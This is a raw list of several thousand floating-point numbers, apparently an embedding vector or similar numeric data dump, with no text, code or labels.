-0.008786178193986416, 0.015027394518256187, 0.01935989037156105, -0.0010490394197404385, 0.014148776419460773, 0.013936696574091911, -0.04541545361280441, 0.02095049060881138, -0.014444174244999886, -0.02552536316215992, 0.0007399136084131896, -0.02145039476454258, -0.0007484346861019731, 0.003734125755727291, 0.0333268828690052, 0.011255397461354733, -0.015300069004297256, 0.015353089198470116, -0.016451360657811165, -0.0032361161429435015, 0.013255010358989239, 0.010876682586967945, -0.04905111342668533, 0.010497968643903732, -0.00934667605906725, -0.006525252480059862, 0.00565799605101347, 0.014338133856654167, 0.00018036282563116401, 0.0024161990731954575, 0.014716848731040955, -0.016890671104192734, -0.0066994610242545605, -0.023586343973875046, 0.00397271616384387, 0.00892251543700695, 0.008839198388159275, -0.011270546354353428, 0.03296331688761711, -0.004476406145840883, 0.00569208012893796, -0.013732191175222397, -3.587433070606494e-7, -0.0019560607615858316, 0.02852478250861168, -0.004506703466176987, 0.012376392260193825, 0.015936309471726418, 0.018329786136746407, -0.011959806084632874, 0.016648292541503906, -0.009914747439324856, 0.004733932204544544, -0.021632177755236626, 0.014353282749652863, -0.008407463319599628, 0.028070325031876564, -0.015436406247317791, 0.008180234581232071, -0.01510313805192709, -0.035477980971336365, -0.027252301573753357, 0.028176365420222282, 0.0012961506145074964, -0.02717655897140503, 0.023813573643565178, 0.007710629142820835, -0.01539096049964428, -0.046354666352272034, -0.013171693310141563, -0.028100622817873955, 0.023389412090182304, -0.021238313987851143, -0.0024919419083744287, 0.007464464288204908, 0.023343967273831367, 0.010217719711363316, -0.015224326401948929, -0.02235930971801281, -0.01629987545311451, 0.03890156373381615, -0.01817830093204975, -0.005203538574278355, -0.006453296635299921, 0.008983110077679157, 0.02367723546922207, -0.032478563487529755, -0.014906206168234348, 0.011838617734611034, 0.0020526330918073654, -0.008293849416077137, -0.004048458766192198, -0.02219267375767231, -0.005373959895223379, -0.003544768551364541, -0.009467864409089088, 0.0009874983225017786, 0.016239281743764877, -0.0074493158608675, 0.022586537525057793, 0.022813767194747925, -0.01932959258556366, 0.011081188917160034, 0.0034065376967191696, 0.02175336517393589, -0.010240442119538784, -0.02181396074593067, 0.03678075969219208, -0.01104331761598587, 0.013868528418242931, -0.005737525876611471, -0.015504575334489346, 0.005654208827763796, -0.03538709133863449, -0.009505735710263252, -0.0033970698714256287, 0.020602073520421982, 0.0254193227738142, -0.021844256669282913, 0.008914940990507603, -0.030630435794591904, 0.009551181457936764, -0.04720298573374748, 0.03484174236655235, -0.028645971789956093, 0.0017439806833863258, -0.011278119869530201, 0.010384353809058666, -0.020526330918073654, 0.01254302728921175, -0.007218299899250269, -0.027025071904063225, -0.013247435912489891, -0.02398020774126053, -0.024419516324996948, -0.016920967027544975, 0.007566717453300953, 0.004968735389411449, 0.014398728497326374, 0.021359503269195557, 0.024601299315690994, 0.029418548569083214, 0.00038510540616698563, -0.008112066425383091, 0.022207822650671005, 0.009164893068373203, 0.026555467396974564, -0.01872364990413189, 0.015936309471726418, -0.02316218428313732, -0.03799264878034592, -0.030797069892287254, 0.03859858959913254, 0.002995632356032729, -0.008096917532384396, -0.0528685562312603, -0.05205053091049194, -0.019420484080910683, -0.0038931858725845814, -0.015709081664681435, 0.04262811318039894, -0.021662473678588867, 0.0038704629987478256, 0.015799973160028458, -0.025843482464551926, 0.00565799605101347, -0.0013889357214793563, -0.014565362595021725, 0.011035743169486523, 0.016981562599539757, -0.019874941557645798, 0.012111292220652103, 0.031054595485329628, -0.007013794034719467, -0.007127408403903246, -0.020162764936685562, -0.029751816764473915, -0.0046013821847736835, 0.003648915095254779, -0.011793171986937523, -0.029070131480693817, -0.003633766435086727, 0.004465044941753149, 0.013694318942725658, -0.016375618055462837, -0.033660151064395905, 0.0014069246826693416, -0.03865918517112732, -0.00441202474758029, 0.013058078475296497, 0.004643040709197521, -0.012952039018273354, -0.017284533008933067, -0.02585863135755062, 0.007521271705627441, 0.014020013622939587, -0.019511375576257706, -0.012149163521826267, 0.01673918403685093, -0.012315798550844193, -0.0028895922005176544, -0.011838617734611034, -0.05262617766857147, -0.019072066992521286, -0.011573517695069313, -0.013345901854336262, 0.0007934070308692753, 0.018360083922743797, -0.016208983957767487, 0.0009193296427838504, -0.0017638631397858262, 0.03114548698067665, 0.005298216827213764, -0.021526137366890907, 0.0009628818370401859, -0.009929896332323551, -0.00691154133528471, -0.004555936437100172, 0.014065459370613098, 0.01232337299734354, 0.02519209496676922, -0.01505011785775423, 0.004283261951059103, -0.02572229504585266, -0.007619737647473812, 0.021601879969239235, 0.003987864591181278, -0.061169978231191635, 0.018496420234441757, 0.018208596855401993, 0.029312508180737495, 0.003535300726071, 0.008884644135832787, 0.013936696574091911, 0.0024180926848202944, 0.011974954977631569, -0.028782308101654053, -0.0031755217351019382, 0.015368238091468811, -0.010982722975313663, -0.007733352016657591, -0.00763488607481122, -0.03562946617603302, 0.007816668599843979, -0.02437407150864601, 0.0019276572857052088, -0.02087474800646305, 0.018466122448444366, 0.008589246310293674, 0.023934761062264442, 0.016920967027544975, -0.008581672795116901, -0.008324146270751953, 0.015148583799600601, -0.0052414098754525185, 0.02623734623193741, -0.009839004836976528, -0.00416586035862565, 0.034296393394470215, -0.012785403989255428, 0.005108859855681658, 0.03593244031071663, -0.01232337299734354, 0.015398534946143627, 0.005866288673132658, -0.020026426762342453, -0.025904078036546707, -0.019481077790260315, -0.001545155537314713, -0.01314896997064352, 0.026616061106324196, -0.007070601452142, 0.027691610157489777, -0.0026036626659333706, -0.009028555825352669, 0.026419129222631454, -0.004673338029533625, -0.003931057173758745, 0.01795107126235962, 0.0019579543732106686, -0.007343275938183069, -0.05986719951033592, 0.011505348607897758, 0.003675424959510565, -0.0032588390167802572, -0.018663054332137108, -0.004211306106299162, -0.024404367431998253, -0.03653838485479355, 0.0002081746788462624, -0.012686938978731632, 0.010710048489272594, 0.01079336553812027, 0.017738990485668182, -0.0049497997388243675, 0.016451360657811165, -0.030630435794591904, 0.03061528690159321, -0.008740732446312904, 0.014012439176440239, 0.020617222413420677, -0.01619383506476879, -0.027827948331832886, 0.009990490972995758, 0.012164312414824963, 0.013391347602009773, 0.015428831800818443, 0.020147616043686867, -0.018678203225135803, -0.004938438069075346, 0.002999419579282403, 0.0017884796252474189, 0.008339295163750648, 0.02299555018544197, -0.004555936437100172, -0.011278119869530201, 0.002482474083080888, 0.045809317380189896, 0.02714626118540764, 0.010687325149774551, 0.01966286078095436, 0.0012525984784588218, -0.010361631400883198, -0.010550987906754017, 0.033084504306316376, -0.023949909955263138, -0.004980096593499184, -0.003995439037680626, 0.014315411448478699, -0.0007711575599387288, -0.02835814841091633, -0.02329852059483528, -0.02090504579246044, -0.011671983636915684, 0.010467670857906342, 0.025813186541199684, -0.009020981378853321, 0.015799973160028458, 0.012406690046191216, -0.008566523902118206, 0.031236378476023674, -0.019859792664647102, 0.007937857881188393, -0.015262197703123093, 0.005866288673132658, -0.01602720096707344, 0.02491942048072815, -0.0009628818370401859, -0.005741313099861145, -0.010876682586967945, 0.0018973600817844272, -0.021510988473892212, -0.02316218428313732, -0.01626957766711712, -0.005832204595208168, 0.029221616685390472, -0.006487380713224411, 0.012739958241581917, 0.0019636352080851793, 0.014762294478714466, -0.006832011044025421, -0.022132080048322678, 0.01892057992517948, -0.009998065419495106, 0.008983110077679157, -0.017193641513586044, -0.0018604353535920382, 0.0048816311173141, -0.0032304353080689907, -0.023495452478528023, 0.013035356067121029, 0.013224713504314423, -0.03756848722696304, -0.016784630715847015, 0.00031670008320361376, 0.0007044091471470892, -0.011914360336959362, -0.007638673298060894, -0.016814926639199257, -0.021571582183241844, -0.010604008100926876, -0.031569648534059525, -0.027903690934181213, 0.011126634664833546, 0.0054231928661465645, 0.08658929914236069, 0.03031231462955475, -0.017193641513586044, 0.00019491965940687805, -0.01599690318107605, -0.010013213381171227, 0.0046203178353607655, 0.014815314672887325, 0.016102943569421768, -0.001676758867688477, 0.013194415718317032, -0.016845224425196648, -0.012194609269499779, 0.013588279485702515, 0.002715383656322956, 0.005616337060928345, 0.0048816311173141, -0.0009609882836230099, 0.03111519105732441, 0.016814926639199257, 0.03990136831998825, 0.0033459432888776064, 0.022541092708706856, -0.020147616043686867, 0.029615480452775955, -0.013239861465990543, -0.00016130873700603843, -0.00013846751244273037, -0.04565782845020294, -0.005835991818457842, -0.0033667725510895252, 0.005252771079540253, -0.008801327086985111, -0.007259958423674107, -0.0017430338775739074, 0.008914940990507603, 0.034296393394470215, -0.005684505682438612, 0.007831817492842674, -0.020223358646035194, 0.011437180452048779, -0.00522626144811511, 0.00676005519926548, -0.010384353809058666, -0.010884257033467293, -0.02313188649713993, 0.01420937106013298, -0.011815895326435566, -0.010043511167168617, -0.021662473678588867, -0.008990684524178505, -0.014459323137998581, -0.01495165191590786, 0.04020433872938156, -0.02498001419007778, -0.007566717453300953, -0.0032588390167802572, -0.0027911264915019274, -0.015156157314777374, -0.02357119508087635, 0.019117511808872223, 0.0013273946242406964, -0.00456351088359952, 0.02993359975516796, -0.020465735346078873, 0.005661782808601856, -0.03890156373381615, 0.004305984824895859, 0.006294236518442631, 0.014338133856654167, 0.00365838292054832, -0.00021527557692024857, 0.0046922736801207066, -0.0037530616391450167, 0.007396295666694641, -0.004862695466727018, -0.009361824952065945, 0.0056049758568406105, -0.014391154050827026, -0.018875135108828545, 0.0011531859636306763, 0.04677882418036461, -0.0004506703407969326, 0.006998645607382059, -0.011202377267181873, 0.013171693310141563, -0.007040304131805897, 0.0055481684394180775, 0.0016246855957433581, -0.034326691180467606, -0.0047680167481303215, -0.0021397373639047146, -0.008149937726557255, -0.0003266413405071944, 0.005252771079540253, -0.00007290255598491058, -0.0065328264608979225, -0.015072840265929699, 0.000531620578840375, -0.01089183147996664, -0.01629987545311451, 0.011732577346265316, 0.03505382314324379, 0.002480580471456051, 0.010649453848600388, 0.01808740943670273, 0.003656489308923483, 0.02010216936469078, 0.0050406912341713905, -0.007161492947489023, -0.04620317742228508, -0.02095049060881138, 0.005116433836519718, -0.024631597101688385, 0.0052754939533770084, -0.02401050366461277, 0.007161492947489023, 0.01142960600554943, 0.00547242583706975, -0.024904271587729454, -0.016542252153158188, -0.012126441113650799, 0.032720938324928284, -0.03214529529213905, -0.004616530612111092, -0.009907173924148083, -0.013656447641551495, -0.030630435794591904, 0.04632436856627464, 0.04559723660349846, 0.007339488714933395, 0.0037833587266504765, 0.021238313987851143, -0.006763842422515154, 0.03890156373381615, -0.007566717453300953, 0.02360149286687374, -0.00688503123819828, 0.016087794676423073, -0.006710822228342295, -0.0069721355102956295, 0.01814800314605236, 0.011831043288111687, 0.0028649757150560617, 0.029418548569083214, 0.007854540832340717, -0.007437954191118479, 0.02337426319718361, 0.021389799192547798, 0.04053761065006256, -0.005086136981844902, 0.0013027781387791038, 0.023919612169265747, 0.04656674340367317, -0.003181202569976449, -0.017632950097322464, 0.010581285692751408, -0.01892057992517948, -0.024025652557611465, -0.004287049174308777, 0.006638866849243641, 0.00632074661552906, 0.015072840265929699, -0.002715383656322956, -0.002558216918259859, 0.009907173924148083, 0.0014817208284512162, -0.025010311976075172, -0.030448652803897858, -0.009589053690433502, 0.013141396455466747, 0.013853379525244236, -0.029615480452775955, 0.004578659310936928, 0.009354250505566597, 0.02155643329024315, -0.008793752640485764, -0.006513890810310841, -0.005245197098702192, -0.0002904267457779497, 0.0030221424531191587, 0.008733157999813557, -0.032478563487529755, -0.025343580171465874, 0.02976696565747261, 0.0030600137542933226, 0.03350866585969925, 0.004779377952218056, -0.03556887432932854, -0.00512779550626874, 0.0020677815191447735, 0.006816862616688013, -0.021541286259889603, -0.0011976849054917693, -0.04571842402219772, -0.025813186541199684, -0.01036920491605997, -0.012580898590385914, 0.018102556467056274, -0.00838474091142416, 0.0007645300938747823, -0.006104879081249237, -0.01111148577183485, -0.030388059094548225, 0.011005445383489132, -0.014254816807806492, 0.013709467835724354, -0.0186933521181345, -0.03108489327132702, -0.004548361990600824, -0.00954360794275999, -0.005483787041157484, -0.0012014720123261213, 0.017390573397278786, 0.01889028400182724, 0.003968928940594196, 0.0032266483176499605, -0.03984077274799347, 0.0034481962211430073, 0.007892412133514881, -0.01411090511828661, 0.025888929143548012, -0.004847546573728323, 0.004480193369090557, -0.013898825272917747, 0.000955307565163821, 0.027161410078406334, -0.01158109214156866, -0.015141009353101254, -0.01036920491605997, 0.012353669852018356, 0.022556239739060402, 0.02552536316215992, -0.007381147239357233, -0.0025752591900527477, -0.0036981478333473206, -0.005873863119632006, -0.022344160825014114, 0.01605749875307083, -0.03390252962708473, -0.016360469162464142, -0.006703248247504234, -0.03756848722696304, 0.0070478785783052444, -0.007953005842864513, -0.00031243954435922205, 0.025434471666812897, 0.006953199859708548, -0.016042349860072136, 0.01781473308801651, -0.013065652921795845, -0.015072840265929699, 0.010361631400883198, 0.0004094851319678128, 0.009255784563720226, 0.017390573397278786, 0.013853379525244236, -0.010043511167168617, 0.04505188763141632, -0.004968735389411449, 0.025888929143548012, -0.0024919419083744287, -0.025010311976075172, -0.009679945185780525, -0.008899793028831482, 0.018966026604175568, -0.018738796934485435, -0.010490394197404385, -0.028070325031876564, 0.0004078282800037414, -0.005722377449274063, 0.011490200646221638, -0.005582252983003855, 0.0014324878575280309, -0.0035788528621196747, 0.005135369952768087, 0.01164926029741764, -0.023889316245913506, -0.0035788528621196747, 0.0035788528621196747, -0.010414650663733482, 0.02572229504585266, 0.006191983353346586, -0.012255203910171986, -0.006900179665535688, 0.005237622652202845, -0.011755300685763359, -0.03650808706879616, 0.0011579198762774467, -0.020556626841425896, -0.008786178193986416, 0.020829301327466965, 0.0000184031614480773, -0.010649453848600388, -0.006267726421356201, -0.016981562599539757, -0.01993553526699543, 0.03962869569659233, 0.011414457112550735, 0.0023309881798923016, -0.005775397177785635, 0.012868721969425678, 0.007721990346908569, -0.0027816586662083864, -0.02205633744597435, 0.014694125391542912, -0.009846579283475876, -0.0066085695289075375, 0.01224005501717329, 0.008043897338211536, 0.04044671729207039, -0.021253462880849838, -0.020995937287807465, 0.007206938695162535, -0.004093904513865709, -0.006710822228342295, -0.009407270699739456, 0.003567491425201297, -0.0009501001914031804, -0.008914940990507603, 0.01717849262058735, 0.018405528739094734, -0.021662473678588867, -0.039113640785217285, -0.010081382468342781, -0.018935728818178177, -0.0004087750567123294, 0.013239861465990543, 0.01352011039853096, -0.0008459537057206035, 0.023328818380832672, 0.006695673801004887, 0.010876682586967945, 0.02131405659019947, -0.005381534341722727, 0.011565943248569965, 0.01261119544506073, 0.024843676015734673, -0.00413177628070116, -0.00416586035862565, -0.029842708259820938, 0.01291416771709919, -0.019647711887955666, -0.00813478883355856, 0.015815120190382004, -0.012088569812476635, 0.021677622571587563, 0.015466704033315182, -0.008210532367229462, -0.011278119869530201, -0.03847740218043327, -0.00877102930098772, 0.01286114752292633, 0.004733932204544544, 0.01505011785775423, 0.019268998876214027, 0.002944505773484707, 0.00956633035093546, -0.0007323393365368247, 0.0027191706467419863, -0.02926706336438656, 0.005608763080090284, 0.005733738653361797, 0.000949626846704632, -0.00419237045571208, 0.02731289528310299, -0.013588279485702515, -0.008892218582332134, 0.014519916847348213, 0.0034974291920661926, -0.006975922733545303, -0.015845417976379395, -0.02010216936469078, 0.02337426319718361, 0.0042226677760481834, -0.011088763363659382, 0.03514471277594566, -0.01383823063224554, -0.012808127328753471, 0.007021368481218815, 0.015413683839142323, 0.005230048205703497, 0.010073808021843433, -0.023768126964569092, -0.009164893068373203, 0.004877843894064426, -0.028433891013264656, 0.021298907697200775, 0.001792266732081771, -0.004370366223156452, -0.0274492334574461, 0.015481851994991302, 0.021268611773848534, 0.03650808706879616, 0.013012632727622986, -0.025237539783120155, 0.0333268828690052, 0.00763488607481122, -0.02916102297604084, 0.004794526845216751, 0.026343386620283127, -0.015375812537968159, -0.0025941948406398296, 0.015398534946143627, 0.002387795364484191, 0.025343580171465874, -0.028100622817873955, -0.03687165305018425, 0.016845224425196648, -0.025131499394774437, 0.02285921201109886, -0.021738216280937195, 0.004889205098152161, -0.017996516078710556, -0.01798136904835701, -0.026373684406280518, -0.01882968842983246, 0.009051278233528137, 0.00028924326761625707, -0.010346482507884502, 0.0006277194479480386, -0.00478316517546773, -0.016708888113498688, -0.025510214269161224, 0.017451167106628418, 0.013285307213664055, 0.007089537102729082, -0.02764616534113884, 0.00791513454169035, 0.035175010561943054, -0.0006670110742561519, 0.026919033378362656, 0.005430767312645912, -0.012429412454366684, 0.007081962656229734, -0.002821423579007387, -0.016784630715847015, -0.010694899596273899, -0.013830656185746193, -0.023510601371526718, 0.0026301727630198, 0.0030335038900375366, -0.014391154050827026, 0.0060783689841628075, -0.002736212918534875, 0.0001926710392581299, 0.002009080955758691, 0.024707339704036713, -0.008006026037037373, 0.0072296615689992905, 0.022541092708706856, -0.0030353975016623735, 0.018799392506480217, 0.013913974165916443, 0.007756074890494347, -0.0009482066379860044, 0.029070131480693817, 0.013807933777570724, 0.01005108468234539, -0.011778023093938828, 0.02750982716679573, -0.029070131480693817, 0.017663247883319855, -0.0014249136438593268, 0.015512149780988693, 0.012785403989255428, 0.011270546354353428, -0.01239154115319252, -0.014807740226387978, -0.015148583799600601, 0.001421126420609653, -0.004760442301630974, 0.010679751634597778, -0.0052754939533770084, 0.0035068970173597336, -0.010444948449730873, -0.000377057702280581, -0.013118673115968704, 0.0020639945287257433, -0.0097632622346282, 0.022480497136712074, 0.0056807189248502254, -0.014103330671787262, -0.009483013302087784, 0.0017080027610063553, 0.032720938324928284, 0.0035012164153158665, 0.017996516078710556, 0.0021548860240727663, -0.003573172027245164, 0.007210725452750921, -0.001725044916383922, -0.020087022334337234, 0.0034576640464365482, -0.004143137484788895, 0.012065846472978592, 0.01764809899032116, 0.004324920475482941, -0.0020469522569328547, 0.0033061783760786057, 0.00001382456139253918, -0.01020257081836462, 0.015981756150722504, 0.0000399721393478103, 0.023328818380832672, 0.0013075120514258742, -0.007589440327137709, 0.016042349860072136, 0.015277346596121788, -0.0004741033189930022, 0.004457470495253801, 0.018375230953097343, 0.003832591697573662, 0.03141816332936287, 0.010710048489272594, -0.0024199862964451313, 0.0007313925307244062, 0.02437407150864601, -0.012755107134580612, -0.016118092462420464, 0.0009742432739585638, 0.015451555140316486, -0.0072637456469237804, -0.024404367431998253, -0.01217188686132431, 0.0008824049727991223, 0.007172854151576757, 0.001995825907215476, -0.02781279943883419, 0.021404948085546494, 0.006828223820775747, -0.014201796613633633, 0.0006513890693895519, -0.027131112292408943, -0.0060594333335757256, 0.0038856116589158773, 0.00766897015273571, -0.0004045145178679377, 0.023025846108794212, 0.003575065638870001, 0.01707245409488678, -0.02882775478065014, -0.005108859855681658, 0.016784630715847015, -0.016284726560115814, -0.008793752640485764, 0.011747726239264011, -0.040295232087373734, -0.02616160362958908, -0.0025165583938360214, -0.020768707618117332, -0.005563317332416773, -0.0039083342999219894, -0.004821036476641893, -0.011558368802070618, 0.013557981699705124, -0.006979709956794977, -0.005684505682438612, -0.0158302690833807, -0.005442128516733646, -0.015436406247317791, 0.010414650663733482, 0.015618189238011837, 0.01480016577988863, 0.0016256324015557766, 0.020389992743730545, 0.015231900848448277, -0.008293849416077137, -0.014133628457784653, -0.025101203471422195, 0.0039651417173445225, -0.005676931701600552, -0.013012632727622986, 0.0025051969569176435, 0.008187809027731419, 0.006127601955085993, -0.001506337313912809, -0.010285887867212296, 0.027418935671448708, 0.002117014490067959, 0.006748693995177746, 0.002556323539465666, -0.012505155988037586, -0.01111148577183485, -0.004877843894064426, -0.00806662067770958, 0.01079336553812027, -0.015678783878684044, -0.017860179767012596, -0.013315604999661446, 0.0018964132759720087, 0.006710822228342295, -0.009376972913742065, 0.0028820179868489504, -0.008846772834658623, 0.005760248750448227, -0.02232901193201542, 0.0017667035572230816, -0.012065846472978592, 0.02585863135755062, 0.0011692813131958246, 0.01589086465537548, -0.010967574082314968, -0.008589246310293674, -0.007899986580014229, 0.025343580171465874, 0.014020013622939587, 0.0030562267638742924, -0.02329852059483528, -0.01976890116930008, 0.015951458364725113, -0.014512342400848866, 0.0028403594624251127, 0.009793559089303017, -0.006684312596917152, -0.010043511167168617, 0.01657254993915558, 0.00013432532432489097, 0.0023309881798923016, -0.021980594843626022, 0.011656834743916988, -0.005199751351028681, -0.0036280856002122164, 0.01748146489262581, -0.0026036626659333706, 0.011588666588068008, 0.009278506971895695, 0.0069153280928730965, 0.014686551876366138, 0.005146731156855822, -0.0016521423822268844, 0.01882968842983246, 0.01740572229027748, 0.0022628195583820343, -0.0006783725111745298, 0.02960033155977726, -0.01929929479956627, -0.008028749376535416, 0.0005391949089244008, 0.0026699379086494446, -0.003184989560395479, -0.014285113662481308, 0.003188776783645153, 0.005726164672523737, -0.015057692304253578, 0.019253849983215332, 0.01361857634037733, -0.0016871734987944365, -0.010301036760210991, -0.013982142321765423, 0.015739377588033676, 0.015784824267029762, -0.008127215318381786, 0.008763455785810947, -0.008748306892812252, -0.01045252289623022, -0.008657415397465229, 0.006672950927168131, -0.020193060860037804, -0.012027975171804428, 0.0158302690833807, 0.0027930201031267643, -0.010884257033467293, 0.013058078475296497, 0.02013246715068817, 0.0005249931127764285, -0.011156931519508362, -0.006968348287045956, 0.021526137366890907, 0.012346095405519009, -0.0013889357214793563, 0.010634305886924267, -0.008846772834658623, 0.02401050366461277, 0.008778603747487068, 0.014345708303153515, 0.0027968070935457945, -0.013186842203140259, -0.015951458364725113, 0.001649301964789629, -0.0036034693475812674, -0.0062260678969323635, -0.0036716379690915346, 0.004340068902820349, -0.007267532870173454, -0.014527491293847561, -0.01919325441122055, -0.0274492334574461, 0.0013501174980774522, -0.015027394518256187, -0.01602720096707344, -0.01345194224268198, 0.00713119562715292, -0.010263165459036827, -0.00005230995157035068, -0.020602073520421982, 0.005169454030692577, -0.00041469247662462294, -0.0013008846435695887, -0.007744713220745325, -0.030494097620248795, -0.010081382468342781, -0.007237235549837351, 0.006627505179494619, -0.014512342400848866, 0.013141396455466747, -0.00490814121440053, 0.01035405695438385, -0.0028933794237673283, -0.017148196697235107, 0.02357119508087635, 0.01993553526699543, 0.011732577346265316, -0.005559530109167099, 0.010164699517190456, -0.0031243953853845596, -0.013383773155510426, -0.0028876985888928175, 0.015709081664681435, -0.004646827932447195, -0.012739958241581917, 0.017935922369360924, -0.0007313925307244062, -0.05068716034293175, 0.0013198202941566706, 0.0050406912341713905, -0.013042930513620377, -0.0066426536068320274, -0.005461064167320728, 0.02572229504585266, 0.01935989037156105, 0.0023461368400603533, 0.02246534824371338, -0.006941838189959526, -0.000024069087885436602, 0.010240442119538784, 0.004703635349869728, -0.002391582587733865, 0.010755494236946106, 0.002925570122897625, 0.015587892383337021, -0.0069456254132092, 0.00438551465049386, -0.004794526845216751, -0.006657802499830723, -0.00821810681372881, 0.0019996128976345062, 0.01398971676826477, -0.011959806084632874, 0.002469219034537673, 0.011338714510202408, 0.02434377372264862, 0.013603427447378635, 0.006737332325428724, 0.002569578355178237, -0.0032152868807315826, -0.016087794676423073, 0.011937083676457405, -0.0031319695990532637, 0.0016559294890612364, 0.00966479629278183, 0.021329205483198166, -0.007763648871332407, 0.0007455943268723786, 0.013095950707793236, -0.005991264712065458, -0.001316979993134737, -0.01949622668325901, -0.01616353914141655, -0.01186891458928585, -0.006245003547519445, -0.008884644135832787, 0.015633337199687958, -0.004828610923141241, 0.0006755321519449353, -0.012459710240364075, 0.006843372713774443, -0.017557207494974136, -0.004582446534186602, -0.024828528985381126, -0.013807933777570724, -0.008255978114902973, -0.025676848366856575, 0.00002213113293692004, 0.005919308867305517, -0.011808320879936218, 0.007680331822484732, 0.009505735710263252, 0.018981175497174263, -0.012618769891560078, 0.0005756461760029197, 0.006048072129487991, -0.007032729685306549, -0.009490587748587132, 0.0042226677760481834, -0.0007238182588480413, -0.001452370430342853, 0.009361824952065945, -0.002751361345872283, -0.006051858887076378, 0.0025033033452928066, -0.007653821725398302, 0.0008426399435847998, -0.0015243261586874723, 0.017360275611281395, 0.014527491293847561, -0.009702667593955994, 0.011217526160180569, 0.023419709876179695, 0.00005091935963719152, 0.002935037948191166, -0.007441741414368153, -0.00919518992304802, -0.011588666588068008, 0.00038202834548428655, -0.00853622704744339, -0.02073840983211994, 0.00622228067368269, 0.00506720133125782, 0.010755494236946106, 0.010058659128844738, 0.013951845467090607, 0.007691693026572466, -0.016421064734458923, -0.0034254733473062515, 0.004355217795819044, -0.007116047199815512, -0.021223165094852448, 0.0239044651389122, -0.020359696820378304, -0.02764616534113884, 0.013330752961337566, 0.006847159471362829, -0.012421838007867336, -0.03003964014351368, 0.028433891013264656, -0.007487187162041664, -0.029827561229467392, 0.014459323137998581, 0.0028744437731802464, -0.017799586057662964, 0.013255010358989239, 0.01283084973692894, 0.00010485659731784835, 0.007089537102729082, -0.00748339993879199, -0.013611001893877983, -0.00638134079053998, 0.012452135793864727, 0.00413177628070116, 0.013633725233376026, -0.012618769891560078, -0.0008085556328296661, 0.0006244056858122349, -0.013474664650857449, 0.026691803708672523, 0.009384547360241413, -0.010187421925365925, -0.01889028400182724, 0.0016000691102817655, 0.016587698832154274, 0.006279087625443935, 0.017587505280971527, 0.0006078369333408773, -0.00897553563117981, -0.0005453489720821381, -0.011202377267181873, -0.0061503248289227486, -0.0346902571618557, 0.0015214858576655388, -0.00949816219508648, 0.02279861830174923, 0.03390252962708473, -0.03387223184108734, 0.0034463026095181704, -0.003107353113591671, 0.004127989057451487, -0.006953199859708548, -0.03169083595275879, 0.012845998629927635, 0.011414457112550735, 0.01817830093204975, 0.00691911531612277, -0.014913780614733696, -0.008339295163750648, -0.024555854499340057, -0.022480497136712074, 0.026494871824979782, -0.0004312612290959805, 0.008316571824252605, -0.00882404949516058, 0.02797943353652954, -0.001038624788634479, 0.0074493158608675, 0.007365998812019825, 0.015231900848448277, -0.004665763583034277, -0.01616353914141655, 0.0065896338783204556, 0.00784696638584137, 0.004964948166161776, -0.008695286698639393, -0.00934667605906725, 0.016920967027544975, 0.01133114006370306, 0.014133628457784653, 0.008399889804422855, -0.006120027508586645, 0.009467864409089088, 0.032781533896923065, 0.006676738150417805, 0.003342156298458576, 0.005483787041157484, -0.009005832485854626, 0.03144845739006996, 0.011459902860224247, -0.029236765578389168, 0.012232481501996517, -0.002082930179312825, 0.016814926639199257, 0.016012052074074745, 0.012058272026479244, -0.0074606770649552345, 0.002215480199083686, -0.006388915237039328, 0.00853622704744339, 0.01990523934364319, -0.02387416735291481, -0.005120221059769392, -0.013754913583397865, -0.009452716447412968, 0.025207241997122765, 0.02266228012740612, 0.019178107380867004, -0.03405401483178139, 0.008574098348617554, 0.0031300759874284267, -0.006847159471362829, -0.03381163626909256, 0.015572743490338326, 0.002277968218550086, -0.019344741478562355, -0.01748146489262581, -0.012134015560150146, 0.0005780131323263049, -0.010634305886924267, 0.004745293874293566, 0.0008379060309380293, 0.01495165191590786, -0.004870269447565079, 0.019571969285607338, 0.0015659847995266318, -0.0070478785783052444, -0.021223165094852448, -0.009308804757893085, -0.019284145906567574, 0.009634499438107014, -0.005290642846375704, 0.03356926143169403, -0.016814926639199257, 0.0013756806729361415, -0.009429993107914925, 0.023389412090182304, 0.014838037081062794, 0.0013292882358655334, -0.02357119508087635, 0.00050842430209741, -0.005389108322560787, 0.0023385626263916492, -0.0007318659336306155, -0.018193447962403297, -0.00044096578494645655, 0.025570807978510857, -0.012232481501996517, -0.0035239392891526222, 0.013020207174122334, -0.015557595528662205, 0.00017728576494846493, 0.01690581813454628, 0.015353089198470116, -0.004995245486497879, -0.01717849262058735, -0.0313272699713707, -0.02310158871114254, -0.006332107819616795, -0.020556626841425896, -0.01308080181479454, -0.00512779550626874, 0.019678009673953056, -0.007968154735863209, -0.014959226362407207, -0.027631016448140144, 0.02411654405295849, 0.020920192822813988, 0.01737542450428009, 0.008574098348617554, -0.004423386417329311, -0.005858714692294598, 0.017905624583363533, -0.01596660725772381, -0.0017837457126006484, -0.0005519764963537455, -0.00036687974352389574, 0.0029312509577721357, 0.01757235638797283, 0.0009013406815938652, -0.01855701394379139, 0.0034463026095181704, 0.003476599929854274, -0.009407270699739456, 0.007233448326587677, -0.003756848629564047, 0.004574872087687254, -0.003806081600487232, 0.01511828601360321, 0.006123814731836319, -0.005960967391729355, 0.020768707618117332, 0.00172125780954957, 0.010967574082314968, 0.005476213060319424, 0.013345901854336262, -0.008475632406771183, -0.01542125828564167, -0.01032375916838646, 0.007157705724239349, -0.013595853932201862, -0.0005230995011515915, -0.001276268158107996, -0.02142009697854519, -0.0018396060913801193, 0.016421064734458923, 0.022510794922709465, 0.0033402626868337393, -0.00002615497578517534, 0.022571388632059097, -0.003444409230723977, 0.008581672795116901, 0.021889703348279, -0.0006215653265826404, -0.01764809899032116, -0.01436085719615221, -0.015277346596121788, 0.0037076156586408615, 0.0034197927452623844, 0.012815701775252819, -0.013997291214764118, -0.017754139378666878, 0.0002956340613309294, -0.0004894885933026671, -0.0030751624144613743, 0.00946028996258974, -0.002012867946177721, -0.013209564611315727, 0.008627118542790413, 0.01693611592054367, 0.01646650955080986, 0.0017477677902206779, -0.012845998629927635, 0.004317346028983593, -0.03061528690159321, -0.0012137802550569177, -0.0008142363512888551, 0.01232337299734354, 0.019511375576257706, 0.0008596820989623666, -0.03393282741308212, -0.008324146270751953, -0.01707245409488678, 0.015951458364725113, -0.012626344338059425, -0.0020791429560631514, -0.03447817638516426, -0.006093517877161503, 0.0010140083031728864, -0.009551181457936764, -0.000591741525568068, -0.020283952355384827, 0.008180234581232071, 0.012838424183428288, -0.008596820756793022, 0.0016190048772841692, 0.031599946320056915, -0.006930476985871792, -0.010566136799752712, 0.004290836397558451, -0.0036167241632938385, 0.02764616534113884, -0.0037852523382753134, 